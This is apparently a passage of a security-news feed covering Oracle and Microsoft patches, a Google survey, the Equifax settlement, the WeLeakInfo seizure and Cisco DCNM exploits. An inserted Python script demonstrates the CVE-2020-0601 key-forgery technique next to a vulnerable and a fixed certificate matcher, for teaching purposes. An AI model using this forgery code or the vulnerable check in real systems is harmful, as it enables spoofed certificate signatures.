“Until you apply the Critical Patch Update patches, it may be possible to reduce the risk of successful attack by blocking network protocols required by an attack. For attacks that require certain privileges or access to certain packages, removing the privileges or the ability to access the packages from users that do not need the privileges may help reduce the risk of successful attack,” it explained.

“Both approaches may break application functionality, so Oracle strongly recommends that customers test changes on non-production systems. Neither approach should be considered a long-term solution as neither corrects the underlying problem.”

Among the products affected by this quarter’s CPU are popular platforms including the following (new patches, with the number that are remotely exploitable in parentheses):
  • Oracle Database Server: 12 (3)
  • Oracle Communications Applications: 25 (23)
  • Oracle E-Business Suite: 23 (21)
  • Oracle Enterprise Manager: 50 (10)
  • Fusion Middleware: 38 (30)
  • Java SE: 12
  • JD Edwards: 9
  • MySQL: 19 (6)
  • Siebel CRM: 5
  • Oracle Virtualization: 22 (3)
  • PeopleSoft: 15 (12)

It’s a busy time of the year for IT administrators. Earlier this week, Microsoft released fixes for scores of vulnerabilities in the last regular Patch Tuesday for Windows 7 and Server 2008.

These included a serious bug in Windows’ certificate validation, disclosed by the NSA, which could allow attackers to circumvent existing security by ‘signing’ malware with a legitimate-looking certificate.
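
What “legitimate-looking” means here, as an added example that is not part of the article: the NSA-reported bug (CVE-2020-0601) was that Windows matched an ECC certificate against a cached trusted root by comparing the public key and curve it carried but not the generator, so an attacker could put his own generator in the certificate’s explicit curve parameters and produce a key he controls whose public point is byte-identical to a real CA’s. The pure-Python P-256 arithmetic below is a toy, the CA private key is a constructed demo value, and the two matcher functions are mine, written to show the vulnerable and the corrected comparison side by side.

```python
# Added example: the key-matching flaw class behind CVE-2020-0601, shown with
# toy P-256 arithmetic. TRUSTED_CA_PRIV is a constructed demo value.
from dataclasses import dataclass

# NIST P-256 (secp256r1) domain parameters
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
GX = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
GY = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
G = (GX, GY)


def ec_add(p1, p2):
    """Affine point addition on P-256; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2:
        if (y1 + y2) % P == 0:
            return None
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, pt):
    """Double-and-add scalar multiplication."""
    acc = None
    while k:
        if k & 1:
            acc = ec_add(acc, pt)
        pt = ec_add(pt, pt)
        k >>= 1
    return acc


def on_curve(pt):
    x, y = pt
    return (y * y - (x ** 3 + A * x + B)) % P == 0


@dataclass(frozen=True)
class EccKey:
    """What a certificate actually carries: the public point plus the curve
    parameters it *claims*: a named curve, or explicit parameters chosen by
    whoever wrote the certificate."""
    q: tuple
    generator: tuple
    order: int


TRUSTED_CA_PRIV = 0x2b7e151628aed2a6abf7158809cf4f3c2b7e151628aed2a6abf7158809cf4f3c  # constructed
TRUSTED_CA = EccKey(q=ec_mul(TRUSTED_CA_PRIV, G), generator=G, order=N)


def forge_key(trusted: EccKey, d_prime: int):
    """Attacker: pick any private key d' and declare G' = d'^-1 * Q as the
    generator, so that d' * G' == Q. The attacker knows d', so he can sign
    with a key whose public point is byte-identical to the CA's."""
    g_prime = ec_mul(pow(d_prime, -1, trusted.order), trusted.q)
    return d_prime, EccKey(q=ec_mul(d_prime, g_prime),
                           generator=g_prime, order=trusted.order)


def matches_trusted_vulnerable(cert_key: EccKey, trusted: EccKey) -> bool:
    """The broken check: same public point on the same curve equation, done."""
    return on_curve(cert_key.q) and cert_key.q == trusted.q


def matches_trusted_fixed(cert_key: EccKey, trusted: EccKey) -> bool:
    """The corrected check also compares generator and order (better still:
    refuse explicit parameters and accept only the named curve)."""
    return (on_curve(cert_key.q) and cert_key.q == trusted.q
            and cert_key.generator == trusted.generator
            and cert_key.order == trusted.order)


if __name__ == "__main__":
    _, forged = forge_key(TRUSTED_CA, d_prime=0x1337)
    print("forged public point equals CA's:", forged.q == TRUSTED_CA.q)
    print("vulnerable matcher accepts forged key:", matches_trusted_vulnerable(forged, TRUSTED_CA))
    print("fixed matcher accepts forged key:", matches_trusted_fixed(forged, TRUSTED_CA))
```

The forged key passes the vulnerable matcher and fails the fixed one; the lesson for anyone writing a certificate cache or pinning check is that a public key is only meaningful together with every domain parameter it was generated under.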

Most high-risk users have poor security practices: Google survey

High-risk users are aware that they are more likely to be targeted by criminals than the general public, yet many of them still have poor security habits, a Google survey shows.

High-risk user groups include executives, lawmakers and their staff, campaigners, bloggers and media influencers. People in these groups are more likely to be targeted in cyber-attacks because of their jobs or online activities.

The Harris Poll, commissioned by Google, surveyed 500 U.S. high-risk users, 100 in each of the five groups listed above.

The results show that 78% of high-risk users are aware that they are more likely to be targeted by hackers than the general public, and 65% are more worried about their accounts being compromised now than they were a year earlier, primarily out of concern for their work accounts.

Nearly three-quarters of respondents have been targeted by phishing, and 39% confirmed that their accounts had been compromised. Phishing attempts often relied on personal information, such as the target’s name or organisation, to increase the chances of success.

While about three-quarters of high-risk users believe their work and personal accounts are secure, and 91% state they have taken steps to secure them, the survey shows that many still follow poor security practices.

More than one-third of respondents said they do not use two-factor authentication, and 71% reuse the same password for at least some accounts. Only half use a security key for two-factor authentication, and 76% conduct work-related correspondence via their personal email accounts, which is generally considered risky behaviour.

The survey shows that high-risk users are more likely to take measures to protect their accounts after a relative’s account is compromised than after an attack on themselves. Nevertheless, 60% of lawmakers confirmed that they made no significant changes to how they protect their finances after the 2016 attack on the Democratic National Committee, and more than half of business executives did not change their behaviour after the 2017 Equifax breach.

Many lawmakers are worried about their work accounts being compromised, with damage to their reputation the main concern. Nearly two-thirds of politicians think they will not be phished, and 81% believe their work accounts are safe. Nearly half have a security advisor to help them protect their online accounts.

Journalists are the least concerned about their identities being compromised and the most likely to believe they will not be phished. Yet respondents in this group were the most likely to report having been targeted by phishing, and of all the high-risk groups they are the least aware of best practices for securing accounts.

Business executives were largely worried about threats to both their personal and work accounts, with their personal information the asset they most fear being hacked. They are also, predictably, worried that a successful hack could harm their company financially. Nearly three-quarters of the executives surveyed said they had been targeted, and one-third had their accounts compromised.

Google published the survey results just as it announced a simplified enrolment process for its Advanced Protection Program, which adds an extra layer of protection to high-risk users’ accounts by requiring security keys.

The post Most high-risk users have poor security practices: Google survey appeared first on .

Facial recognition is real-life ‘Black Mirror’ stuff, Ocasio-Cortez says

"People think they're going to put on a cute filter and have puppy dog ears, and not realize that that data's being collected."

Equifax Breach Settlement Could Cost Firm Billions

Equifax could end up paying as much as $9.5bn following a data breach settlement branded one of the largest in history by its presiding judge.

The credit reporting giant suffered a major cyber-attack in 2017 after hackers exploited an unpatched Apache Struts vulnerability, compromising highly sensitive personal and financial information on around 148 million customers.

Over two-fifths (44%) of the population of the US are thought to have been affected.

This week, a court in Georgia finally approved a settlement in the long-running class action case that followed the breach, which will require Equifax to pay $380.5m, plus potentially an extra $125m, to satisfy claims of out-of-pocket losses.

However, that’s just a small part of the overall financial impact of the ruling.

The firm has agreed to spend at least $1bn on improving its cybersecurity posture over the coming five years. It will also need to fund several years of credit monitoring from Experian and its own services for class members. That could amount to an extra $2bn if all 140 million+ customers sign up.

That’s not to mention the $6bn in credit monitoring services already being claimed by several million class members, their $77.5m in attorney fees and further amounts in litigation expenses that Equifax will need to pay.

The total could creep up towards $10bn — a cautionary tale for organizations tempted to focus on business growth at the expense of cybersecurity and risk mitigation.

“This settlement is the largest and most comprehensive recovery in a data breach case in US history by several orders of magnitude,” wrote district judge Thomas Thrash.

“The minimum cost to Equifax of the settlement is $1.38bn and could be more, depending on the cost of complying with the injunctive relief, the number and amount of valid claims filed for out-of-pocket losses and the number of class members who sign up for credit monitoring.”

Law enforcement seized WeLeakInfo.com for selling access to data from data breaches

The FBI has seized the WeLeakInfo.com websites for selling subscriptions to data that were exposed in data breaches.

WeLeakInfo.com was a data breach notification service that allowed its customers to check whether their credentials had been compromised in data breaches. The service claimed a database of over 12 billion records from over 10,000 data breaches. I use the past tense because a joint operation conducted by the FBI in coordination with the UK NCA, the Netherlands National Police Corps, the German Bundeskriminalamt, and the Police Service of Northern Ireland resulted in the seizure of the WeLeakInfo.com domain.

The WeLeakInfo website was seized and now displays a message informing visitors about the operation conducted by law enforcement agencies.

“The website had claimed to provide its users a search engine to review and obtain the personal information illegally obtained in over 10,000 data breaches containing over 12 billion indexed records – including, for example, names, email addresses, usernames, phone numbers, and passwords for online accounts.  The website sold subscriptions so that any user could access the results of these data breaches, with subscriptions providing unlimited searches and access during the subscription period (one day, one week, one month, or three months).” reads the press release published by the Department of Justice. “With execution of the warrant, the seized domain name – weleakinfo.com – is now in the custody of the federal government, effectively suspending the website’s operation.  Visitors to the site will now find a seizure banner that notifies them that the domain name has been seized by federal authorities.  The U.S. District Court for the District of Columbia issued the seizure warrant.”

Law enforcement is still investigating the operators behind the service and encourages anyone with information to file a complaint with the FBI’s Internet Crime Complaint Center (IC3) at https://www.ic3.gov/complaint/default.aspx

Data breach search services of this kind are a profitable business: visitors pay a fee to access data exposed in past breaches. Subscription fees ranged from a $2 trial to $70 for a three-month unlimited-access account, allowing users to search for any data in the archive managed by the operators.

This is quite different from services that only alert individuals when their data appears in a breach, which for that reason are considered legal.

Services like WeLeakInfo are a gold mine for threat actors, who can use them to gather information on their targets before launching an attack.

Pierluigi Paganini

(SecurityAffairs – WeLeakInfo, data breach)

The post Law enforcement seized WeLeakInfo.com for selling access to data from data breaches appeared first on Security Affairs.

Data Breach Site WeLeakInfo Suspended as Feds Swoop

Data Breach Site WeLeakInfo Suspended as Feds Swoop

The FBI has joined forces with the UK’s National Crime Agency (NCA) and other law enforcers to suspend a popular website which sells access to stolen data.

The WeLeakInfo[.]com domain was seized by the Feds after the District Court for the District of Columbia issued a warrant, although its administrators are still at large.

Although the site claimed to be focused on helping breached internet users discover if their personal data had been compromised, by selling access to billions of records it also provided a useful resource for cyber-criminals looking to launch credential stuffing, phishing and other attacks.

“The website had claimed to provide its users a search engine to review and obtain the personal information illegally obtained in over 10,000 data breaches containing over 12 billion indexed records – including, for example, names, email addresses, usernames, phone numbers, and passwords for online accounts,” a statement from the Department of Justice explained.

“The website sold subscriptions so that any user could access the results of these data breaches, with subscriptions providing unlimited searches and access during the subscription period (one day, one week, one month, or three months).”

The way it operated stood in contrast to legitimate breach notification site HaveIBeenPwned, which only lets users know if their accounts have been compromised, rather than providing access to troves of breached data.

Jake Moore, cybersecurity specialist at ESET, argued that hackers can do a great deal of damage even just with limited sets of breached emails and names.

“The big risk comes from brute force attacks, where criminals use common password combinations against emails to try and break into personal accounts,” he added.

“An incredibly large amount of people still use predictable or simple passwords. Many people's passwords are also readily available on the dark web, so it quickly and simply becomes an exercise in joining the dots for the cyber-criminals.”

The FBI is seeking any information on the owners and operators of WeLeakInfo.

Analysis: Huawei 5G Dilemma

The latest edition of the ISMG Security Report discusses why Britain is struggling to determine whether to use China's Huawei technology in developing its 5G networks. Plus: An update on a mobile app exposing infant photos and videos online and an analyst's take on the future of deception technology.

What Website Owners Should Know About Terms and Conditions

All website owners should treat terms and conditions (T&Cs) as a form of legal protection, since they establish the rights and responsibilities of the parties involved. T&Cs give you a documented basis for resolving matters should anything go amiss, and they can help you settle disputes quickly without resorting to the courts.

Is it a legal requirement to include T&Cs?
No, but it’s always best to include terms and conditions on your website as they will enable you to reduce your potential liabilities. It is essential that you let your customers or visitors know about their rights; if you’re not clear about your policies, they may dispute matters such as cancellation options, item returns and other rights, putting your company at a disadvantage. Additionally, if areas of your terms and conditions are unclear or not mentioned at all, you may be liable to give your customers additional rights beyond those granted by statute.
Do you have to include GDPR provisions?
Website owners, even those outside the European Union (EU), should also consider incorporating the General Data Protection Regulation. Inserting a data protection clause can reassure your customers that their data will not be used for inappropriate purposes. You can include the majority of the GDPR obligations in your site’s privacy policy.

What should you include in the T&Cs?
If you are an online seller, it is essential to explain to customers the various processes involved, such as:
  • How to make a purchase
  • How to make a payment
  • How they will receive their products
  • How they can cancel orders
T&Cs help you establish boundaries by outlining what specific rights customers have. In return, you also inform them about your obligations as a seller and the limits of your legal liability.

What kind of protection can you expect from the T&Cs? It is not uncommon for disputes to arise between you and your online customers or visitors, so it is essential that your terms and conditions are readily accessible, preferably on your website itself.

You also need to protect your website from copyright infringements. You can avoid potential disputes and confusion by specifying which sections are copyrighted and which are your intellectual property. You should also stipulate what visitors can do with your data. If there is any breach of your copyright or intellectual property, the terms and conditions should clearly explain how the problem will be resolved.

Are there standard T&Cs which apply to all websites?
There are general formats or templates of T&Cs that you can obtain for free online. However, there is always the possibility that these documents will not cover specific aspects of your business or will not include the relevant terms. If you omit an essential term from your website, you may find yourself vulnerable if a dispute arises. Therefore, it is critical that you customise your terms and conditions so they are suitable for your website and business.
  • Product and service offerings – No two businesses are alike, even if you sell the same products and services. For example, your competitor may only accept PayPal but you may allow other modes of payment.
  • Industry or target audience – In every industry, there are specific provisions that need to be included in the T&Cs. For example, customers may have a legal right to cancel or return their purchases within a specified period.
Can website owners enforce their T&Cs?
Your T&Cs are like any other enforceable contract. Nevertheless, you must ensure that they don’t contravene existing consumer laws or government regulations. Remember, you should only incorporate clauses that you can legally apply.

Terms and conditions are necessary for all businesses, including e-commerce sites. It is essential that you create T&Cs that are suitable for your products and services, and that they are legally enforceable. You also need to periodically review your T&Cs, especially if there have been any significant changes to your business structure or the law. Moreover, they must be accessible to your online customers and visitors. If they are not aware of your T&Cs, you may find it difficult to enforce them if a problem arises.

Written by Kerry Gibbs, a legal expert at BEB Contract and Legal Services.

Expert released PoC exploits for recently disclosed Cisco DCNM flaws

A researcher has publicly released some proof-of-concept (PoC) exploits and technical details for flaws in Cisco’s Data Center Network Manager (DCNM).

Early this month, Cisco released security updates for its Cisco’s Data Center Network Manager (DCNM) product that address several critical and high-severity vulnerabilities.

All the vulnerabilities were reported to Cisco through Trend Micro’s Zero Day Initiative (ZDI) and Accenture’s iDefense service by the security researcher Steven Seeley of Source Incite and Harrison Neal from PatchAdvisor.

Cisco published six advisories covering a dozen vulnerabilities. Eleven were reported by Seeley; three of these were rated critical and seven high severity. The issues reported by Neal were rated medium severity.

Some of the critical flaws addressed by Cisco in DCNM could be exploited by attackers to bypass authentication and execute arbitrary actions with admin privileges on the vulnerable devices.

“Multiple vulnerabilities in the authentication mechanisms of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.” reads the advisory published by Cisco.

“For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.”

The vulnerabilities have been tracked as CVE-2019-15975, CVE-2019-15976 and CVE-2019-15977. The issues affect the REST API endpoint, the SOAP API endpoint and the web-based management interface.

Cisco also addressed two high-severity SQL injection flaws that could be exploited by an attacker with administrative privileges to execute arbitrary SQL commands on a vulnerable device.

Three of the high-severity weaknesses could be exploited to conduct path traversal, and two other high-severity issues could be exploited by an attacker with admin rights to inject arbitrary commands on the underlying operating system.

Seeley published technical details for three remote code execution chains and the various techniques used in his exploits.

“In this post, I share three (3) full exploitation chains and multiple primitives that can be used to compromise different installations and setups of the Cisco DCNM product to achieve unauthenticated remote code execution as SYSTEM/root. In the third chain, I (ab)use the java.lang.InheritableThreadLocal class to perform a shallow copy to gain access to a valid session.” wrote Seeley in a blog post.

Cisco assigned only 11 CVE identifiers to the flaws reported by Seeley, who says he found over 100 exploitable bugs, including a hundred SQL injection issues, two command injections, four instances of hardcoded keys and credentials, four cases of XML external entity (XXE) injection, and 20 file read/write/delete issues.

Cisco has updated the advisories informing its customers of the availability of PoC exploits.

“The Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerabilities that are described in this advisory.” states Cisco.

“Cisco PSIRT is not aware of any malicious use of the vulnerabilities that are described in this advisory. “

Pierluigi Paganini

(SecurityAffairs – Cisco DCNM, hacking)

The post Expert released PoC exploits for recently disclosed Cisco DCNM flaws appeared first on Security Affairs.